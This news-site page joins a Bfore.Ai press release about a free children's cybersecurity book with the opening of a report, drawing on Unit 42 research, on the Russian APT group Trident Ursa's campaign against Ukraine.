“In today’s world, security is a high-pressure, demanding field. It’s often hard to share a few quiet moments with those we love. We wanted to capture the spirit of sharing and caring that is essential to this time of year,” said Luciano Allegro, CMO at Bfore.Ai. “We felt the best way to do that was to create a book that gives an introduction to a new wave of cybersecurity technology — a predictive cybersecurity — wrapped in a fun story that anyone could enjoy.”

Developed with security professionals in mind, this book offers a great way to start the conversation about cybersecurity in general and predictive cybersecurity, specifically with anyone of any age. Any parent can use the accessible nature of the tale to share the importance of cybersecurity and even address how the nature of security can sometimes seem mystical. 

Bfore.ai created this fun fairytale adventure to help people of all ages learn about the technology that can prevent them or their companies from being victims of cyber threats without the sales pitch aspect that can turn the average person off. In keeping with their intention to promote sharing and moments of caring, this delightful tale is entirely free and ready for anyone to download to enjoy with the whole family. Please visit The King, The Knight & The Snowball.

About Bfore.Ai:

Headquartered in Montpellier, France, Bfore.AI launched in 2020 to deliver actionable intelligence insights to enterprises, focusing on predictive models that can see vulnerable vectors in enterprise cyber networks. For more information, please visit https://bfore.ai/ or contact Sonia Awan – PR for Bfore.Ai at \[email protected\]

Bfore.Ai Releases 'The King, The Knight & The Snowball' - Cybersecurity Book for Children

Security Service-backed Trident Ursa APT group shakes up tactics in its relentless cyberattacks against Ukraine.

Physical threats against a Ukrainian cybersecurity researcher and a failed attempt to breach a petroleum refinery inside a NATO-member nation are just the latest notable salvos in Russian state-backed APT group Trident Ursa's campaign against Ukraine.

Researchers at Palo Alto Network's Unit 42 reported on the APT group (also known as Gamaredon, Primitive Bear, Shuckworm, and UAC-0010) tactics over the past 10 months, noting the connection between Trident Ursa and the Russian Federal Security Service.

"As the conflict has continued on the ground and in cyberspace, Trident Ursa has been operating as a dedicated access creator and intelligence gatherer," the Unit 42 team explained. "Trident Ursa remains one of the most pervasive, intrusive, continuously active and focused APTs targeting Ukraine."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#intel